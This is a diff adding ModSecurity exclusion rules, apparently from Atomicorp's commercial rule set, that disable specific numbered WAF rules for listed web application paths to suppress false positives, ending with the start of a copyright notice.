+SecRule REQUEST_FILENAME "/backoffice/index\.php" "phase:2,id:92628,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/vd/async/detailpost\.php" "phase:2,id:92629,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/processing_contact_fr\.php" "phase:2,id:92630,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/processing_contact_en\.php" "phase:2,id:92631,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/cbc_portal_api_dev/services/" "phase:2,id:92632,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/computer\.form\.php" "phase:2,id:92633,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin_cf/modif_news\.php" "phase:2,id:92634,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/ecrire/" "phase:2,id:92635,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/dolibarr/compta/" "phase:2,id:92636,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/admin_lecon_eds\.php" "phase:2,id:92637,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cshop/add_cart_confirm" "phase:2,id:92638,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/maintenance/modules-site/menus-pages/mod-content-page\.php" "phase:2,id:92639,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/project\.form\.php" "phase:2,id:92640,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/api/statiqueweb/" "phase:2,id:92641,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/news/admin/modifier-actualite\.html" "phase:2,id:92642,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/contenu/modif_contenu3\.asp" "phase:2,id:92643,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/fr/admin/contenu/modif_contenu3\.asp" "phase:2,id:92644,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/en/admin/contenu/modif_contenu3\.asp" "phase:2,id:92645,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/data/docdata\.php" "phase:2,id:92646,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/compta/facture/card\.php" "phase:2,id:92647,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/admin/contenu/modif_contenu3\.asp" "phase:2,id:92648,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/promotion/actualites/actualites-ajouter/" "phase:2,id:92649,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/utils/operations\.php" "phase:2,id:92650,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/rest/merchant/storefront/" "phase:2,id:92651,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"
+
+SecRule REQUEST_FILENAME "/cbc_portal_api_dev/services/returnmanagement/datafile/" "phase:2,id:92652,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/goggle-ads-auth/auth\.php" "phase:2,id:92653,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/front/softwarelicense\.form\.php" "phase:2,id:92654,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/front/user\.form\.php" "phase:2,id:92655,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/front/monitor\.form\.php" "phase:2,id:92656,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ecrire/" "phase:2,id:92657,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/newsentry/newsitemcreate" "phase:2,id:92658,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/secure_access/catalog/product/validate/" "phase:2,id:92659,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162"
+
+SecRule REQUEST_FILENAME "/wp-json/script-manager/v1/scripts" "phase:2,id:92660,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/kel4dm1n/edit_orders_ajax\.php" "phase:2,id:92661,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/ajax-call" "phase:2,id:92662,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-json/wp/v2/media" "phase:2,id:92663,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/module/personnalisation/product" "phase:2,id:92664,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/theme/design_config/save/back/edit" "phase:2,id:92665,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/applicationerror\.aspx" "phase:2,id:92666,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/admin/app/customer/" "phase:2,id:92667,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/content/instituts/" "phase:2,id:92668,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/auth/module\.php" "phase:2,id:92669,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/auth/module\.php/saml/sp/saml2-logout\.php/default-sp" "phase:2,id:92670,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/auth/module\.php/saml/sp/saml2-logout\.php" "phase:2,id:92671,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/magic/kel4dm1n/categories\.php" "phase:2,id:92672,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340156"
+
+SecRule REQUEST_FILENAME "/portal_api/services/returnmanagement/datafile/amenddatafile" "phase:2,id:92673,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/v2b/json/" "phase:2,id:92674,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cbc_portal_api_dev/services/returnmanagement/datafile/amenddatafile" "phase:2,id:92675,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/scp/plugins\.php" "phase:2,id:92676,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/scp/ajax\.php" "phase:2,id:92677,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-json/wp-statistics/v2" "phase:2,id:92678,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/cbc_portal_api_dev/" "phase:2,id:92679,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wc-api/wc_bookings_google_calendar_wooconnect/" "phase:2,id:92680,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/signinresult\.php" "phase:2,id:92681,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"
+
+SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:92682,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715"
+
+SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:92683,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715"
+
+SecRule REQUEST_FILENAME "/executehtml\.php" "phase:2,id:92684,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/admin/listings\.php" "phase:2,id:92685,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/ajax/send_email_or_sms\.php" "phase:2,id:92686,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-json/wp/v2/" "phase:2,id:92687,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/orders\.php" "phase:2,id:92688,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/content/postsave" "phase:2,id:92689,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "/wp-json/wp/v2/posts/" "phase:2,id:92690,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "/admin/rsvp_edit\.php" "phase:2,id:92691,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-json/contact-form-7/" "phase:2,id:92692,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162"
+
+SecRule REQUEST_FILENAME "/v2b/json/fr\.html\.text/" "phase:2,id:92693,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/block/add/code_block" "phase:2,id:92694,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/v2c/json/fr\.device\.preview/" "phase:2,id:92695,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/pests/edit/" "phase:2,id:92696,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/admin/app/customer/32/edit?uniqid=s64ef8923c69f3" "phase:2,id:92697,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:92698,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/v2a/json/" "phase:2,id:92699,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/v2a/json/" "phase:2,id:92700,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/wp-json/" "phase:2,id:92701,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340130"
+
+SecRule REQUEST_FILENAME "/admin/app/customer/" "phase:2,id:92702,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/admin/ebook/" "phase:2,id:92703,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/api/redbox/" "phase:2,id:92704,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/ajax/update-form" "phase:2,id:92705,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/contao/picker" "phase:2,id:92706,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"
+
+SecRule REQUEST_FILENAME "/amember/admin-products" "phase:2,id:92707,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "/doku\.php" "phase:2,id:92708,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"
+
+SecRule REQUEST_FILENAME "/editor/filter_xss/" "phase:2,id:92709,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/admin/app/media/" "phase:2,id:92710,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/modules/accordion/save_question\.php" "phase:2,id:92711,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/adm_program/modules/announcements/announcements_function\.php" "phase:2,id:92712,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/configgeneral\.php" "phase:2,id:92713,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/apps/weditorwd8/index\.php" "phase:2,id:92714,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "/editcontent" "phase:2,id:92715,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340147"
+
+SecRule REQUEST_FILENAME "/form/save" "phase:2,id:92716,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/westerbus" "phase:2,id:92717,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/client/applications" "phase:2,id:92718,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/moodle/mod/quiz/autosave\.ajax\.php" "phase:2,id:92719,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/backend/livingtech/water/readings/update/1567" "phase:2,id:92720,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/wp-json/contact-form-7/v1/contact-forms/947" "phase:2,id:92721,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:92722,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"
+
+SecRule REQUEST_FILENAME "/backend/" "phase:2,id:92723,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/backend/" "phase:2,id:92724,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"
+
+SecRule REQUEST_FILENAME "/kontakt/" "phase:2,id:92725,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/plugins/servlet/gadgets" "phase:2,id:92726,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/panel/x3_settings\.php" "phase:2,id:92727,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340130"
+
+SecRule REQUEST_FILENAME "/portal_api/services/returnmanagement/datafile" "phase:2,id:92728,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:92729,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340121,ctl:ruleRemovebyID=340152,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "/g/collect" "phase:2,id:92730,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/inside/" "phase:2,id:92731,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:92732,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340121,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "/tml_downloader/" "phase:2,id:92733,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"
+
+SecRule REQUEST_FILENAME "list_bulk\.aspx" "phase:2,id:92734,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "open\.php" "phase:2,id:92735,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:92736,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340122,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "^/contao" "phase:2,id:92737,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2023 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
